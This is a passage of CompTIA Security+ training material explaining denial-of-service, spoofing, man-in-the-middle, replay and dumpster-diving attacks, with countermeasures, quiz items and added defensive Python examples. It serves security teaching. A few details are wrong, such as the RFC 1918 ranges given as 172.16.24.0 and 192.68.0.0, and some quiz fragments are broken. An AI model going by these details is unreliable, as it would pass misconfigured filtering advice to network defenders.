Smurf is a non-OS-specific attack that uses a third party's network segment to overwhelm a host with a flood of Internet Control Message Protocol (ICMP) packets. As shown in Exhibit 3-3, three parties are involved: the attacker, an intermediary network (preferably with numerous hosts), and the victim (typically a computer or router on the Internet).
1 The hacker sends a ping (echo-request) packet to the intermediary network's broadcast address. The packet's source IP address is faked to be that of the victim system.
2 Because the ping was sent to the broadcast address of the intermediary network, every host on that subnet replies to the victim's IP address.
3 The third party's hosts unwittingly deluge the victim with ping packets.
Using this technique, the hacker can not only overwhelm the computer system receiving the flood of echo packets, but can also saturate the victim's Internet connection with bogus traffic and therefore delay or prevent legitimate traffic from reaching its destination.
Exhibit 3-3: Smurf attack

Countermeasures
Protective measures against Smurf attacks can be placed in the network or on individual hosts.
• Configure routers to drop ICMP messages from outside the network with a destination of an internal broadcast or multicast address.
• Configure hosts to ignore echo requests directed to their subnet broadcast address.
Most current router and desktop operating systems have protection in place to guard against well-known Smurf attacks by default, but changes to the configuration or new modifications of the attack might make the network and hosts vulnerable.
Ping of Death
There are a number of attacks that exploit some operating systems' incorrect handling or error checking of fragmented IP packets. The Ping of Death is a well-known exploit that uses IP packet fragmentation techniques to crash remote systems. When first released, this shockingly simple attack had the ability to crash any machine that could receive a ping packet. All the attacker needed in order to carry it out was the victim's IP address!

Mode of attack
Explain the nature of IP packets and the concept of the MTU. You can explain an MTU by using a floppy disk analogy. If you want to transfer 5MB of information from one computer to the other using a floppy disk, you will have to split the information up into chunks small enough for the floppy to handle and then reassemble the data on the other computer.
This common exploit misuses the way that large IP packets (or more specifically, ICMP packets, because the attack uses a ping) are transmitted across networks. The maximum size of an IP packet is 65,535 bytes, but packets that large cannot be transmitted on many network topologies. For example, the maximum transmission unit (MTU) for Ethernet, probably the most commonly used LAN topology, is only 1500 bytes. To transmit a large IP packet across a LAN, hosts and routers fragment IP packets into smaller Ethernet frames and then reassemble the fragments at the destination. Each fragment contains an offset value that tells the receiving host where to insert its data into the reassembled packet. In the Ping of Death, a very large ICMP (ping) packet is crafted and transmitted to the victim, fragment by fragment. With each fragment, the size of the reassembled ping grows to near the 65,535-byte size limit of the IP packet. When the final fragment arrives, its offset value forces the packet to grow beyond the IP size limit, causing the victim host to crash.

Countermeasures
What made this attack particularly problematic was that recent Windows operating systems allowed the generation of nonstandard pings from the regular user command line, but the same systems would die when presented with one of these packets. Most manufacturers have now provided patches that make their systems invulnerable to the Ping of Death and other types of IP fragmentation attacks. Starting with Windows 2000, Microsoft has removed the ability to generate ICMP packets of invalid size by setting the maximum packet size to 53,000 bytes.
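The bounds check that a patched IP stack performs on each fragment, as an added example that is not from the manual: a fragment whose offset plus length would grow the datagram past 65,535 bytes is refused before anything is written into the reassembly buffer, so the oversize final fragment of a Ping of Death never lands. The fragment tuples are constructed for the example.

```python
MAX_IP_PACKET = 65535   # IP total-length field is 16 bits
IP_HEADER_LEN = 20      # minimal IPv4 header; fragment offsets count only the payload


class FragmentError(ValueError):
    """Raised for a fragment that could never belong to a legal datagram."""


class Reassembler:
    """Collects the fragments of one datagram and refuses any fragment whose
    offset plus length would push the reassembled packet past the IP limit."""

    def __init__(self):
        self.parts = {}     # payload offset in bytes -> payload
        self.total = None   # payload length, known once the last fragment arrives

    def add(self, offset_units, more_fragments, payload):
        start = offset_units * 8                 # the offset field counts 8-byte units
        end = start + len(payload)
        if end + IP_HEADER_LEN > MAX_IP_PACKET:  # the check the Ping of Death relied on missing
            raise FragmentError(f"fragment would grow packet to {end + IP_HEADER_LEN} bytes")
        if more_fragments and len(payload) % 8:
            raise FragmentError("non-final fragment length must be a multiple of 8")
        self.parts[start] = payload
        if not more_fragments:
            self.total = end
        return self.complete()

    def complete(self):
        """Return the payload once every byte from 0 to total is present, else None."""
        if self.total is None:
            return None
        pos, out = 0, bytearray()
        for start in sorted(self.parts):
            if start != pos:
                return None                      # a gap remains
            out += self.parts[start]
            pos += len(self.parts[start])
        return bytes(out) if pos == self.total else None


def reassemble(fragments):
    """fragments: iterable of (offset_units, more_fragments, payload) in arrival order."""
    r, result = Reassembler(), None
    for off, more, payload in fragments:
        result = r.add(off, more, payload)
    return result


def is_oversize_datagram(fragments):
    """True when the fragment set is rejected for exceeding 65,535 bytes."""
    try:
        reassemble(fragments)
        return False
    except FragmentError:
        return True


# Constructed inputs: a legal three-fragment ping payload, and an illegal set whose
# final fragment sits at the highest offset the field allows (8191 * 8 = 65528).
LEGAL = [(0, True, b"A" * 16), (2, True, b"B" * 16), (4, False, b"C" * 5)]
OVERSIZE = [(0, True, b"A" * 8), (8191, False, b"x" * 8)]
```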
A-2:
• Flooding a host with ICMP messages
• Transmitting excessively large IP packets
• Filling the half-open connection queue with bogus connections
• Overwhelming a DNS server with lookup requests
Exhibit 3-4: Distributed denial-of-service attack

This is typically a large machine with plenty of disk space and a fast Internet connection, so the malicious hacker has the resources necessary to upload an exploit toolkit. It's important that the hacker go undetected on the handler machine, so hosts with a large number of user accounts or inattentive system administrators are targets for use as handlers. Once the handler has been set up with the necessary software tools, it begins to use automated scripts to scan large chunks of ISP address space (DSL and cable customers making the best targets because of their bandwidth and constant connection) to find hosts to use as agents, or zombies. The scripts used for this purpose generally target specific, known vulnerabilities in Windows operating systems and can complete the task of compromising each system and uploading the zombie software within a matter of seconds. The software is transparent to the machine's owner, as it is imperative to the attacker that their tools go undetected.
Hundreds or thousands of zombies might be required to launch a successful DDoS attack, because most major Web sites have sufficient bandwidth and server resources to handle substantial amounts of network traffic. This is not an obstacle for the determined script kiddie, as the ever-increasing number of unprotected home PCs connected to the Internet provides ample fodder for creating a large army of zombies.

Conducting DDoS attacks
The agent software on compromised hosts usually communicates with the handler machine via Internet Relay Chat (IRC) connections. These hosts are automatically logged on to an IRC channel where they passively wait for attack orders from the handler machines. When the malicious hacker is ready to launch the attack, a command is issued through the handler machine to the thousands of agents connected to the channel. Depending on the type of agent software installed, the attacker has a number of attack types to choose from, as listed in the following table:
If students are unfamiliar with UDP, explain that it is a connectionless protocol often used for network broadcast messages.
More information about Trinity can be found at www.ciac.org/ciac/bulletins/k-072.shtml

Tools                        Flooding or attack methods
Trin00                       UDP
Tribe flood network          UDP, ICMP, SYN, Smurf
Stacheldraht and variants    UDP, ICMP, SYN, Smurf
TFN 2K                       UDP, ICMP, SYN, Smurf
Shaft                        UDP, ICMP, SYN combo
Mstream                      Stream (ACK)
Trinity, Trinity v3          UDP, SYN, RST, Random Flag, ACK, Fragment
When the attacker is ready to launch the attack, the zombies are remotely instructed to flood the victim network, which they do without the machines' owners ever being aware that their computer has been compromised. For an account of a DDoS attack, and the hacker's methods and objectives, see Steve Gibson's account at http://grc.com/dos/grcdos.htm.
DDoS countermeasures
The following table outlines actions you can take to safeguard your network against DDoS attacks.
Equipment: Clients and servers
Action:
• Install the latest security patches from your software vendors.
• Install and configure personal firewalls on desktop PCs.
• Install antivirus software and maintain up-to-date signatures.
• Perform regular hard disk scans with the antivirus software.

Equipment: E-mail servers
Action:
• Install antivirus software on all mail servers, both internal and external, to protect the network from e-mail worms.

• Filter packets coming into the network destined for a broadcast address. This can help to prevent your network from being susceptible to the Smurf attack.
• Turn off directed broadcasts on all internal routers. This also internally prevents a Smurf attack.
• Block any packet from entering your network that has a source address that is not permissible on the Internet. This type of address would include RFC 1918 address space (10.0.0.0, 172.16.24.0, and 192.68.0.0), multicast address space (224.0.0.0), and loopback addresses (127.0.0.0).
• Block any packet that uses a protocol or port that is not used for Internet communications in your network.
• Block packets with a source address originating inside your network from entering your network.
• Block packets with fake source addresses from leaving your network.
Inform students that a detailed discussion of firewalls will be offered later in the course.
A-3:
Here's how
See the classroom setup instructions for the location of the download file.
5 Under Target IP address range, enter the range specified by your instructor
This type of scan is often detected by a network administrator and might violate computer use policies if done without permission.
6 Click Start
To determine whether the system is infected. The scan will take a few seconds to complete. Wait until the Program stopped message appears. If no names appear in the Infected Hosts section and, in the Status section, Zombies detected is 0, your system is clean.
Do it!
A-4:
2 List three countermeasures you can implement to protect clients and servers from DDoS attacks.
Answers might include:
• Install the latest security patches
• Install and configure personal firewalls on desktop PCs
• Install antivirus software and maintain up-to-date signatures
• Perform regular hard disk scans with the antivirus software
3 Number the steps to launch a DDoS attack in the proper sequence.
___ Zombies log onto IRC channel to communicate with the handler
___ Zombies flood the victim network
___ Attacker compromises machine to be used as a handler
___ Handler uploads the zombie software
___ Handler scans for hosts to use as agents or zombies
___ Handler launches attack
3 5 4 1 6 2
Man-in-the-middle attacks have a variety of applications, including:
• Web spoofing: This is an attack in which the assailant arranges his Web server between his victim's Web browser and a legitimate server. In this case, the attacker can monitor and record the victim's online activity, as well as modify the content being viewed by the victim.
• TCP session hijacking: By arranging for traffic between two hosts to pass through his machine, an attacker can actually take over the role of one of them and assume full control of the TCP session. For example, by monitoring a victim's communications with an FTP server, the attacker can wait for the victim to authenticate and then hijack the TCP session and take over the user's access to the FTP server.
• Information theft: The attacker can passively record data communications in order to gather sensitive information that might be passing between two hosts. This information could include anything from industrial secrets to username and password information.
• Many other attacks, including denial-of-service attacks, corruption of transmitted data, or traffic analysis to gain information about the victim's network.
B-1:
2 TCP session hijacking is an attack in which the assailant arranges his Web server between his victim's Web browser and a legitimate server. True or false?
False: Web spoofing does this.
• Monitor and record a victim's online activity
• Modify information presented to a user
• Hijack a session
• Gather confidential information
Topic C: Spoofing
This topic covers the following CompTIA Security+ exam objectives:
#    Objective
1.3  Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols
1.4  Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk: Spoofing
Spoofing types
Explanation
Spoofing is pretending to be someone else by imitating or impersonating that person. When you present credentials (for example, a username/password, hostname, or IP address) that are not yours in order to gain access to a network, you are spoofing that system. This is much like presenting a fake driver's license to illegally buy alcohol or presenting fake credentials to appear as a law enforcement official. Four primary types of spoofing are issues for the information security professional:
• IP address spoofing
• ARP poisoning
• Web spoofing
• DNS spoofing
IP address spoofing
IP address spoofing gains access to a victim by generating TCP/IP packets with the source address of a trusted host. The attacker uses this deception to bypass filters on routers and firewalls and gain access to network resources. The sequence of events for an attack that uses IP spoofing is described below and pictured in Exhibit 3-6.
1 The attacker identifies a target, the victim of the attack, and a machine that is trusted by the victim. The attacker disables the trusted machine's ability to communicate by flooding it with SYN packets.
2 The attacker uses some mechanism to determine the sequence numbers to be used by the victim. This could involve sampling packets between the victim and trusted hosts. The attacker spoofs the source IP address of the trusted host in order to send his or her own packets to the victim.
3 The victim accepts the spoofed packet and responds. Although the network infrastructure automatically routes the victim's reply packets to the trusted host, the trusted host is unable to process the packets because of the SYN flood attack against it.
4 Blind to the victim's response, the attacker must guess its contents and craft an appropriate response, again using a spoofed source address and a guessed sequence number.
Exhibit 3-6: Filtering spoofed packets

Challenges
There are three primary challenges faced by the attacker using IP address spoofing.
1 Although the hacker can craft packets that can be routed via the Internet, past the firewall, to the victim, the perpetrator cannot cause the return packet to be delivered back to his or her machine. This is because the network automatically routes the reply packet to the trusted host. In such a case, the hacker is flying blind and cannot hear the victim host's responses.
2 The victim's reply packets are automatically delivered to the trusted host by the network infrastructure. If the trusted host the hacker is spoofing responds to the packets that it is receiving from the victim, it could interfere with the scheme. To prevent this from happening, the hacker needs to DoS the trusted host to keep it from responding to the victim's packets. This can be accomplished with a SYN flood.
3 This hurdle is perhaps the most difficult to leap: in order for the victim host to accept the spoofed packets from the hacker, the packets must have the correct sequence number. The initial sequence number (ISN) is provided by the victim host as part of a session setup. Remember that the hacker cannot receive any packets back from the victim during the spoofed session. The hacker's ability to craft packets with the correct sequence numbers (which are therefore accepted by the victim) relies on the hacker's ability to narrow the ISN down to an acceptable range and to predict subsequent sequence numbers based on knowledge of the ISN and the victim's algorithm for determining subsequent sequence numbers.
Countermeasures
To prevent IP spoofing, disable source routing on all internal routers. Also, filter out packets entering the local network from the Internet that have a source address of the local network.
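The ingress and egress filtering called for in the DDoS countermeasures table and in the IP spoofing countermeasures just above, as an added example that is not from the manual. The internal prefix 10.20.0.0/16, the allowed protocol set and the sample packets are constructed; the bogon list is the three RFC 1918 private blocks as that RFC defines them, plus multicast, loopback and the 0.0.0.0/8 block.

```python
import ipaddress

# The protected network; an assumed value for the example.
INTERNAL_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Source prefixes that must never arrive from the Internet: the three RFC 1918
# private blocks (as defined in RFC 1918), multicast, loopback and "this network".
BOGON_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "127.0.0.0/8", "0.0.0.0/8")]

# Protocols this (assumed) network uses for Internet communication.
ALLOWED_PROTOS = {"tcp", "udp", "icmp"}


def _in_any(addr, nets):
    return any(addr in n for n in nets)


def filter_packet(src, dst, proto, direction):
    """Return (verdict, reason). direction is "in" (Internet -> LAN) or "out" (LAN -> Internet)."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if proto not in ALLOWED_PROTOS:
        return "drop", "protocol not used for Internet communication"
    if direction == "in":
        # Our own prefix is checked first: it may itself be RFC 1918 space,
        # and "spoofed internal source" is the more useful reason to log.
        if _in_any(s, INTERNAL_NETS):
            return "drop", "internal source address arriving from outside (spoofed)"
        if _in_any(s, BOGON_NETS):
            return "drop", "source address not permissible on the Internet"
        if d.is_multicast or any(d == n.broadcast_address for n in INTERNAL_NETS):
            return "drop", "inbound packet to a broadcast or multicast address (Smurf)"
    elif direction == "out":
        if not _in_any(s, INTERNAL_NETS):
            return "drop", "source address is not ours (spoofed, leaving the network)"
    return "accept", ""


def audit(packets):
    """Apply the policy to (src, dst, proto, direction) tuples; return the verdicts."""
    return [filter_packet(*p)[0] for p in packets]


# Constructed traffic sample, one packet per rule.
SAMPLE = [
    ("198.51.100.7", "10.20.1.5", "tcp", "in"),        # ordinary inbound, accepted
    ("10.20.3.9", "10.20.1.5", "tcp", "in"),           # claims to be internal: spoofed
    ("192.168.1.1", "10.20.1.5", "udp", "in"),         # RFC 1918 source from the Internet
    ("198.51.100.7", "10.20.255.255", "icmp", "in"),   # ping to our broadcast address
    ("198.51.100.7", "10.20.1.5", "gre", "in"),        # protocol not in use here
    ("10.20.1.5", "198.51.100.7", "tcp", "out"),       # ordinary outbound, accepted
    ("203.0.113.4", "198.51.100.7", "tcp", "out"),     # forged source leaving the network
]
```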
Do it!
C-1:
Here's how
See the classroom setup instructions for the location of the download file.
5 Click the right arrow key next to the IP address range
To add the address range as the range to be scanned.
6 Click the blue Start arrow
To start the scan.
7 Review the results
8 Based on the results of the scan, which IP addresses are in use?
Answers will vary. Notice that the IP address of the host performing the scan is not included in the list. This is because no ports are open on the host performing the scan and, by default, hosts without open ports aren't listed. This type of information is very useful to hackers.
9 Which ports are open on those systems?
10 When you are done viewing the scan results, close the application window
ARP poisoning
Explanation
ARP (Address Resolution Protocol) poisoning is a technique used to corrupt a host's ARP table, allowing the hacker to redirect traffic to the attacking machine. The attack can only be carried out when the attacker is connected to the same local network as the target machines.

Operation
ARP operates by sending out ARP request packets. An ARP request broadcasts the question "Whose IP address is x.x.x.x?" to all computers on the LAN, even on a switched network. Each computer examines the ARP request and checks whether it is currently assigned the specified IP. The machine with the specified IP address returns an ARP reply containing its MAC address. To minimize the number of ARP packets being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it updates its ARP cache with the new IP/MAC association. ARP cache poisoning occurs when an attacker sends forged ARP replies. In this case, a target computer could be convinced to send frames to the attacker's PC instead of the trusted host. When done properly, the trusted host will have no idea this redirection took place. Attack tools used for ARP poisoning include ARPoison, Ettercap, and Parasite. These tools are able to spoof ARP packets to perform man-in-the-middle attacks, redirect transmission, or simply intercept packets.

Countermeasures
To stop ARP poisoning, use network switches that have MAC binding features. Switches with MAC binding store the first MAC address that appears on a port and do not allow the mapping to be changed without authentication.
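The MAC binding idea from the countermeasure above, applied on the host or monitoring side, as an added example that is not from the manual or from any of the tools it names: the first IP-to-MAC mapping seen is pinned, later ARP replies that contradict it are reported, and a single MAC answering for several IPs is called out as the classic poisoning signature. The ARP replies and the 10.0.0.0/24 LAN are constructed.

```python
from collections import defaultdict


class ArpWatcher:
    """Host-side equivalent of a switch's MAC binding: the first MAC seen for an
    IP is pinned, and any later ARP reply claiming a different MAC is reported."""

    def __init__(self, gateway_ips=()):
        self.bindings = {}                   # ip -> mac pinned on first sight
        self.ips_per_mac = defaultdict(set)  # mac -> every IP it has answered for
        self.alerts = []
        self.gateway_ips = set(gateway_ips)  # a changed gateway binding is the worst case

    def observe_reply(self, ip, mac, t):
        """Feed one ARP reply (ip, mac, time). Returns an alert dict or None."""
        mac = mac.lower()
        self.ips_per_mac[mac].add(ip)
        pinned = self.bindings.get(ip)
        if pinned is None:
            self.bindings[ip] = mac          # learn, like a switch pinning a port
            return None
        if pinned == mac:
            return None                      # consistent with what we already know
        alert = {"ip": ip, "pinned": pinned, "claimed": mac, "t": t,
                 "severity": "high" if ip in self.gateway_ips else "medium"}
        self.alerts.append(alert)
        return alert

    def suspect_macs(self, min_ips=2):
        """One MAC answering for several IPs is the classic poisoning signature."""
        return {m: sorted(ips) for m, ips in self.ips_per_mac.items() if len(ips) >= min_ips}


def analyze(replies, gateway_ips=()):
    """Run a list of (ip, mac, t) replies through the watcher; return alerts and suspects."""
    w = ArpWatcher(gateway_ips)
    for ip, mac, t in replies:
        w.observe_reply(ip, mac, t)
    return w.alerts, w.suspect_macs()


# Constructed ARP replies on a 10.0.0.0/24 LAN: the gateway and a workstation answer
# normally, then a third host starts answering for both of them.
REPLIES = [
    ("10.0.0.1", "00:11:22:33:44:01", 0.0),    # gateway
    ("10.0.0.20", "00:11:22:33:44:20", 1.0),   # workstation
    ("10.0.0.66", "de:ad:be:ef:00:66", 2.0),   # third host, its own address
    ("10.0.0.1", "DE:AD:BE:EF:00:66", 10.0),   # forged reply: gateway IP, third host's MAC
    ("10.0.0.20", "de:ad:be:ef:00:66", 10.1),  # forged reply: workstation IP, same MAC
    ("10.0.0.20", "00:11:22:33:44:20", 12.0),  # the real workstation answers again
]
```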
Web spoofing
A Web spoofing attack convinces its victims that they are visiting a real and legitimate site, when they are in fact visiting a Web page that has either been created or modified by the attacker to dupe the victim. The attacker can then monitor or modify any data passing between the victim and the Web server. Web spoofing attacks come in two flavors:
• Man-in-the-middle attacks
• Denial of Service attacks

Man-in-the-middle attacks
In this form of Web spoofing, the attacker rewrites the URLs embedded in the Web pages to point to the attacker's Web server rather than a legitimate server. This is accomplished using automated URL editing tools. Assuming the attacker's server is on machine www.attacker.net, the attacker rewrites each URL to begin with http://www.attacker.net/. The link http://newspaper.com becomes http://www.attacker.net/http://newspaper.com.
When the victim clicks on the revised URLs, the browser requests a page from the attacker's server, which then requests the page from the real server. The attacker's server revises the page's URLs before providing the edited version to the victim. Using this method, every page on the World Wide Web can be altered to pass through the attacker's server, as shown in Exhibit 3-7.
Exhibit 3-7: Web spoofing

Denial of Service attacks
Another form of Web spoofing displays a false but convincing Web page to the victim with the objective of obtaining confidential information or providing false information. The Web page mimics a legitimate Web page, but the content is altered to redirect communications from the intended site to the attacker's server. To see some examples of Web spoofing, visit the following page:
http://www.cs.dartmouth.edu/~pkilab/demos/spoofing/
Countermeasures
To defend against Web spoofing attacks, do the following:
• Disable JavaScript, ActiveX, and Java in the browser. The attacker will then be unable to hide the evidence of the attack.
• Display the browser's location line. Instruct users to watch their browser's location line for any dubious URLs.
• Instruct users to set their homepage to a known secure Web site.
DNS spoofing
DNS spoofing manipulates the DNS server to redirect users to an attackers server. The DNS server resolves Internet domain names (www.security.net) to IP addresses (192.168.1.20), taking the burden off the user to remember a series of numbers. DNS spoofing can alter the cache so that www.security.net, which normally translates to an IP address of 203.123.12.10, is redirected to 186.120.0.40.
Attacks and malicious code
DNS spoofing is accomplished in one of three ways:
• The attacker compromises the victim organization's Web server and changes a hostname-to-IP address mapping. When users request the hostname, they are directed to the hacker's server rather than the authentic one.
• Using IP spoofing techniques, the attacker's DNS server, instead of the legitimate DNS server, answers lookup requests from users. Again, the hacker can direct user lookups to the server of his or her choice instead of to the authentic server (also called DNS hijacking).
• When the victim organization's DNS server requests lookups from authoritative servers, the attacker poisons the DNS server's cache of hostname-to-IP address mappings by sending false replies. The organization's DNS server stores the invalid hostname-to-IP address mapping and serves it to clients when they request a resolution.
All three attacks can cause serious security problems, such as redirecting clients to wrong Internet sites or routing e-mail to non-authorized mail servers.

Countermeasures
To prevent DNS spoofing:
• Ensure that your DNS software is the latest version, with the most recent security patches installed.
• Enable auditing on all DNS servers.
• Secure the DNS cache against pollution.
• Deploy anti-IP address spoofing measures.

Do it!
C-2:
Here's how
Tell students the default configuration of Microsoft DNS server allows data from malicious or incorrectly configured servers to be cached in the DNS server. This procedure sets filters in place to protect the cache from DNS spoofing.
1 Click Start; choose Administrative Tools, DNS (this opens the dnsmgmt window)
2 Right-click the server name; choose Properties
3 Activate the Advanced tab
4 Verify that Secure cache against pollution is checked (this filters out bogus cache instructions from unauthorized servers)
5 Click Cancel
6 Close the dnsmgmt window
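The cache-pollution filter that the procedure above switches on can be illustrated in code. The following is an added example, not part of the courseware and not Microsoft's implementation: before any record from a reply is cached, the reply must match the outstanding query (transaction ID and question name), and every record's owner name must lie inside the zone the answering server is authoritative for (its "bailiwick"). The names, addresses and records in the demo are constructed sample values; the address 186.120.0.40 reuses the bogus address from the text.

```python
# Added example (not from the courseware): a bailiwick filter of the kind that
# "Secure cache against pollution" applies.  All names, addresses and record
# data below are constructed sample values.
from dataclasses import dataclass, field


@dataclass(frozen=True)
class RR:
    """One resource record: owner name, type and data."""
    name: str
    rtype: str
    rdata: str


@dataclass
class DnsReply:
    """The parts of a reply that the filter looks at."""
    txid: int
    question: str
    answers: list = field(default_factory=list)
    additional: list = field(default_factory=list)


def normalize(name):
    """Lower-case and fully qualify a name so comparisons are exact."""
    return name.lower().rstrip(".") + "."


def in_bailiwick(owner, zone):
    """True if owner is the zone apex or a name beneath it."""
    owner, zone = normalize(owner), normalize(zone)
    return owner == zone or owner.endswith("." + zone)


def filter_reply(reply, expected_txid, expected_question, zone):
    """Split a reply into records safe to cache and records to discard.

    Returns (accepted, rejected, reason).  A reply whose transaction ID or
    question does not match the query we sent is dropped entirely; this is
    the check a forged reply from a spoofed source has to defeat, which is
    why anti-spoofing measures are listed alongside cache protection.
    """
    if reply.txid != expected_txid or normalize(reply.question) != normalize(expected_question):
        return [], list(reply.answers) + list(reply.additional), "reply does not match outstanding query"
    accepted, rejected = [], []
    for rr in list(reply.answers) + list(reply.additional):
        (accepted if in_bailiwick(rr.name, zone) else rejected).append(rr)
    return accepted, rejected, "ok"


def demo():
    """Constructed scenario: the security.net servers answer our query for
    www.security.net but also try to slip in a mapping for an unrelated
    name, which an unfiltered cache would store and later hand to clients."""
    reply = DnsReply(
        txid=0x1A2B,
        question="www.security.net",
        answers=[RR("www.security.net.", "A", "203.123.12.10")],
        additional=[
            RR("ns1.security.net.", "A", "203.123.12.2"),        # in bailiwick: keep
            RR("www.example-bank.test.", "A", "186.120.0.40"),   # out of bailiwick: drop
        ],
    )
    accepted, rejected, reason = filter_reply(reply, 0x1A2B, "www.security.net", "security.net")
    return [r.name for r in accepted], [r.name for r in rejected], reason


if __name__ == "__main__":
    print(demo())
```

Note what the filter does not catch: an in-bailiwick record with a wrong address (the www.security.net to 186.120.0.40 case from the text) passes the bailiwick test and is stopped only by the query-matching check, so both checks are needed.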
Do it! C-3:
B C D
2 IP address attacks spoof the __________________________ of the trusted host to send its packets to the victim.
source IP address
3 Web spoofing is considered a ___________ attack when the attacker places himself between the victim and the Web server that the victim wants to visit. A B
C
- The attacker compromises the victim's DNS server and changes a hostname-to-IP address mapping
- The attacker rewrites the URLs embedded in legitimate Web pages to include the attacker's Web server
- The attacker's DNS server, instead of a legitimate DNS server, answers lookup requests from users
- The attacker rewrites the content of a Web page to make the victim believe some false information
B
C
Topic D: Replays
This topic covers the following CompTIA Security+ exam objectives:
#    Objective
1.3  Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols
1.4  Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk: Replay
Replay attacks
Explanation
Replay attacks involve listening to and repeating messages from a legitimate user in order to impersonate the user and gain access to systems. To implement a replay attack, the attacker:
1 Uses a sniffer program or device to read and capture packets passed between two hosts on the network. Sniffers work by placing the machine's network interface into promiscuous mode, meaning that it listens to all packet activity on the network.
2 Filters the data and extracts the authentication transaction, typically an encrypted username and password, digital signature, or encryption key.
3 Does not attempt to decrypt the transaction, but instead replays the transaction in order to gain access to a secured resource.
Actually, replay attacks are more challenging than just recording and replaying information. To perform such an attack, the attacker must accurately guess the TCP sequence numbers. The attacker can accomplish this by using a script or utility that automatically makes guesses until the correct sequence is determined.
Web-based replays
A Web application is vulnerable to a replay attack if a user's authentication tokens (non-encrypted session identifier in a URL, unsecured cookie, and so on) are captured or intercepted by an attacker. By simply sniffing an HTTP request of an active session or capturing a desktop user's cookie files, a replay attack can be performed very easily. For example, by sniffing a URL that contains the session ID string, an attacker might be able to obtain or create service to that user's account simply by pasting this URL back into his Web browser. The legitimate user might not need to be logged on to the application at the time of the replay attack.
Other replays
Biometric devices are also vulnerable to replay attacks. In May of 2002, a Japanese researcher presented a study showing that biometric fingerprint readers can be fooled 80 percent of the time by a fake finger created with gelatin, using fingerprints lifted from a drinking glass.
CompTIA Security+ Certification
Countermeasures
Secure authentication systems have an anti-replay feature that makes each packet unique. This ensures that even if authentication data is captured by an attacker, it cannot be retransmitted in order to gain access to systems.
Web applications continue to be vulnerable to replay attacks. This is because assailants can gain access to user credentials via session IDs that are part of URLs stored in proxy server logs. To prevent this type of attack:
- Update software with the latest security patches
- For Web-based transactions, use SSL to encrypt sensitive data
Do it! D-1: Discussing replays
2 A Web application is vulnerable to a replay attack if a users _______________ are captured or intercepted by an attacker.
authentication tokens
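The "anti-replay feature that makes each packet unique" described under Countermeasures can be shown concretely. The following is an added example, not code from the courseware or from any particular authentication product: each authentication message carries a timestamp and a one-time random nonce and is bound to them by an HMAC, and the verifier accepts each valid, fresh nonce exactly once. The shared key, user names and clock values are constructed sample data; the 30-second window is an assumed policy value.

```python
# Added example (not from the courseware): server-side anti-replay checking.
# A captured message that is resent fails either the nonce check (same packet
# seen already) or the freshness window (timestamp too old).
import hashlib
import hmac
import os
import time

WINDOW_SECONDS = 30  # assumed policy: how far a message's timestamp may drift from the verifier's clock


def canonical(user, ts, nonce):
    """The exact bytes the MAC covers; both sides must build them the same way."""
    return f"{user}|{ts:.3f}|{nonce}".encode()


def make_message(key, user, ts=None):
    """Client side: fresh random nonce plus an HMAC over user, time and nonce."""
    ts = time.time() if ts is None else ts
    nonce = os.urandom(16).hex()
    mac = hmac.new(key, canonical(user, ts, nonce), hashlib.sha256).hexdigest()
    return {"user": user, "ts": ts, "nonce": nonce, "mac": mac}


class AntiReplayVerifier:
    """Server side: accept each (authentic, fresh) nonce exactly once."""

    def __init__(self, key, window=WINDOW_SECONDS, clock=time.time):
        self.key = key
        self.window = window
        self.clock = clock        # injectable so the demo and tests are deterministic
        self.seen = {}            # nonce -> timestamp, pruned as entries age out

    def _expire(self, now):
        # Anything older than the window is rejected as stale anyway, so pruning
        # old nonces cannot let a replay through.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}

    def verify(self, msg):
        """Return (accepted, reason). Authenticate first, then freshness, then uniqueness."""
        now = self.clock()
        self._expire(now)
        expected = hmac.new(self.key, canonical(msg["user"], msg["ts"], msg["nonce"]),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, msg["mac"]):
            return False, "bad mac"        # forged or tampered message
        if abs(now - msg["ts"]) > self.window:
            return False, "stale"          # outside the freshness window
        if msg["nonce"] in self.seen:
            return False, "replayed"       # same packet seen already
        self.seen[msg["nonce"]] = msg["ts"]
        return True, "accepted"


def demo():
    """Constructed run: a genuine message, a tampered copy, a verbatim replay, and a late message."""
    key = b"constructed-shared-secret"
    clock = [1000.0]
    verifier = AntiReplayVerifier(key, clock=lambda: clock[0])
    msg = make_message(key, "alice", ts=1000.0)
    first = verifier.verify(msg)                        # genuine: accepted
    tampered = verifier.verify(dict(msg, user="bob"))   # MAC no longer matches
    replay = verifier.verify(msg)                       # captured packet resent
    clock[0] += 120.0
    late = verifier.verify(make_message(key, "alice", ts=1000.0))  # new nonce, old timestamp
    return first, tampered, replay, late


if __name__ == "__main__":
    for result in demo():
        print(result)
```

The order of the checks matters: the MAC is verified before anything else so that an attacker cannot use the nonce cache or the timestamp comparison as an oracle, and the window bounds how long the server must remember nonces.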
Do it! E-1: Reviewing attacks
1 Attacker intercepts communications between two computers with the intent of retransmitting captured data.
2 Attacker intercepts communications between two computers and acts as a relay to access confidential data.
3 Attacker takes over the victim's IP address by corrupting the ARP caches of directly connected machines.
4 Attacker consumes network bandwidth and computer resources to disable a system.
5 Attacker sends very large ICMP packets that are too large for the receiver's buffer when reassembled.
6 Attacker creates an IP address with a forged source address.
7 Attacker intercepts a query to a DNS server and replies with bogus information.
8 Attacker uses hundreds or thousands of hosts on the Internet to flood a victim with requests or deprive it of its resources.
9 Attacker hijacks a TCP session to access network resources using the identity of a trusted host.
Replay
ARP poisoning
DoS
Ping of Death
IP address spoofing
DNS spoofing
DDoS
Dumpster diving
Digging useful information out of an organization's trash bin is another form of attack, one that makes use of the implicit trust that people have that once something is in the trash, it's gone forever. Experience shows that this is a very bad assumption, as dumpster diving is an incredible source of information for those who need to penetrate an organization in order to learn its secrets. The following table lists the useful information that can be obtained from trash bins:
Item: Internal phone directories
Description: Provide names and numbers of people to target and impersonate; many usernames are based on legal names.
Item: Organizational charts
Description: Provide information about people who are in positions of authority within the organization.
Further items in the table:
- Indicate how secure (or insecure) the company really is.
